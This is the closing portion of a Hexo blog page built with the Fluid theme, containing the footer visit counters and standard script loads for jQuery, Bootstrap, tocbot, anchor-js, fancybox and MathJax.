       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  
      <script>
        if (!window.MathJax) {
          window.MathJax = {
            tex    : {
              inlineMath: { '[+]': [['$', '$']] }
            },
            loader : {
              load: ['ui/lazy']
            },
            options: {
              renderActions: {
                insertedScript: [200, () => {
                  document.querySelectorAll('mjx-container').forEach(node => {
                    let target = node.parentNode;
                    if (target.nodeName.toLowerCase() === 'li') {
                      target.parentNode.classList.add('has-jax');
                    }
                  });
                }, '', false]
              }
            }
          };
        } else {
          MathJax.startup.document.state(0);
          MathJax.texReset();
          MathJax.typeset();
          MathJax.typesetPromise();
        }

        Fluid.events.registerRefreshCallback(function() {
          if ('MathJax' in window && MathJax.startup.document && typeof MathJax.startup.document.state === 'function') {
            MathJax.startup.document.state(0);
            MathJax.texReset();
            MathJax.typeset();
            MathJax.typesetPromise();
          }
        });
      </script>
    

  <script  src="https://lib.baomitu.com/mathjax/3.2.2/es5/tex-mml-chtml.js" ></script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<!--<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>-->
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-MML-AM_CHTML"></script>
</body>
</html>
